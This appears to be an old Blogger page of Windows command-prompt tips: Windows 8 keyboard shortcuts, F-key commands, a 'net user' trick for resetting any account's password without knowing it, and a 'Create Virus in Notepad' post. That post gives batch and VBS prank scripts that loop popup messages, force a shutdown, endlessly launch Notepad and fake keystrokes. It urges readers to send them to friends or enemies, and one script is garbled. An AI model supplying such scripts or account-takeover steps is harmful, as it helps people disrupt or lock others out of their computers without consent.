This is default featured slide 1 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 2 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 3 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 4 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 5 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

Showing posts with label Command Prompt. Show all posts
Showing posts with label Command Prompt. Show all posts

Sunday 24 February 2013

New Shortcut Key For Windows 8

New keyboard shortcuts for Windows 8 and Windows RT

With Windows 8 and Windows RT, you can use the keyboard shortcuts you're already using, and you'll find new ones too. For example, the easiest way to search on the Start screen is to simply start typing. Not on the Start screen? Press the Windowslogo key‌ Windows logo key and you can quickly switch between Start and the app you're in.
If you’re not familiar with keyboard shortcuts—or you’d like to see a list of shortcuts in one place—see the bigger list of keyboard shortcuts.
Here are some of the most useful keyboard shortcuts for Windows.
Press this
To do this
Windows logo key‌ Windows logo key+start typing
Search your PC
Ctrl+plus (+) or Ctrl+minus (-)
Zoom in or out of a large number of items, like apps pinned to the Start screen
Ctrl+scroll wheel
Zoom in or out of a large number of items, like apps pinned to the Start screen
Windows logo key‌ Windows logo key+C
Open the charms
Windows logo key‌ Windows logo key+F
Open the Search charm to search files
Windows logo key‌ Windows logo key+H
Open the Share charm
Windows logo key‌ Windows logo key+I
Open the Settings charm
Windows logo key‌ Windows logo key+J
Switch the main app and snapped app
Windows logo key‌ Windows logo key+K
Open the Devices charm
Windows logo key‌ Windows logo key+O
Lock the screen orientation (portrait or landscape)
Windows logo key‌ Windows logo key+Q
Open the Search charm to search apps
Windows logo key‌ Windows logo key+W
Open the Search charm to search settings
Windows logo key‌ Windows logo key+Z
Show the commands available in the app
Windows logo key‌ Windows logo key+spacebar
Switch input language and keyboard layout
Windows logo key‌ Windows logo key+Ctrl+spacebar
Change to a previously selected input
Windows logo key‌ Windows logo key+Tab
Cycle through open apps (except desktop apps)
Windows logo key‌ Windows logo key+Ctrl+Tab
Cycle through open apps (except desktop apps) and snap them as they are cycled
Windows logo key‌ Windows logo key+Shift+Tab
Cycle through open apps (except desktop apps) in reverse order
Windows logo key‌ Windows logo key+PgUp
Move the Start screen and apps to the monitor on the left (Apps in the desktop won’t change monitors)
Windows logo key‌ Windows logo key+PgDown
Move the Start screen and apps to the monitor on the right (apps in the desktop won’t change monitors)
Windows logo key‌ Windows logo key+Shift+period (.)
Snaps an app to the left
Windows logo key‌ Windows logo key+period (.)
Snaps an app to the right

Wednesday 19 December 2012

Super Trick - Change any user's password easily

This tweak gives a user the opportunity to use it for good or bad. It enables the user to re-password any account without having to know the existing password and also shows you every account that exists on the machine (even the ones that are hidden). This is a good tool to use if you forgot a password to say your administrator account and you needed to be logged into the admin account for any reason.

>>To view all of the user accounts:

1) While logged onto the computer, click on Start>Run>and type CMD.
2) From the command prompt window, type in cmd "net users".
This will show you every account that is made onto the computer whether it is hidden or not.


To change an account password:
1) While logged into the computer to an account that has administrative rights, click on Start>Run>and type CMD.

2) Type in "net user" then the name of the account then * and press enter. here is an example: net user administrator * or net user "Jay Prakash" * . Put the name in quotes if it contains spaces.

3) From there it should ask for a new password. Type in your new password (type very carefully - the command window won't display what you type) and once more to confirm it. If you get the message that the command succeeded successfully you're all set!!

Create Virus in Notepad

1. Cycle a message in your friend's computer:
open notepad and Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as Anything.BAT and send it to ur frenz or enemy.
2. Convey your friend a lil' message and shut down his / her computer:
Type :

wx@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s


Save it as Anything.BAT in All Files and send it.


3.Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32
otepad.exe
GOTO top


Save it as Anything.BAT and send it.
4.Hack your friend's keyboard and make him type You are a fool simultaneously
Type :
Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys You are a fool.
loop

Save it as Anything.VBS and send it.

If you like it please share link.
Feel Free to Comment.....

Friday 14 December 2012

List of F1-F9 Key Commands for the Command Prompt

List of F1-F9 Key Commands for the Command Prompt
  • F1 / right arrow: Repeats the letters of the last command line, one by one.

  • F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line

  • F3: Repeats the last command line

  • F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line

  • F5: Goes back one command line

  • F6: Enters the traditional CTRL+Z (^z)

  • F7: Displays a menu with the command line history

  • F8: Cycles back through previous command lines (beginning with most recent)

  • F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.

  • Alt+Enter: toggle full Screen mode.

  • up/down: scroll thru/repeat previous entries

  • Esc: delete line

  • Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.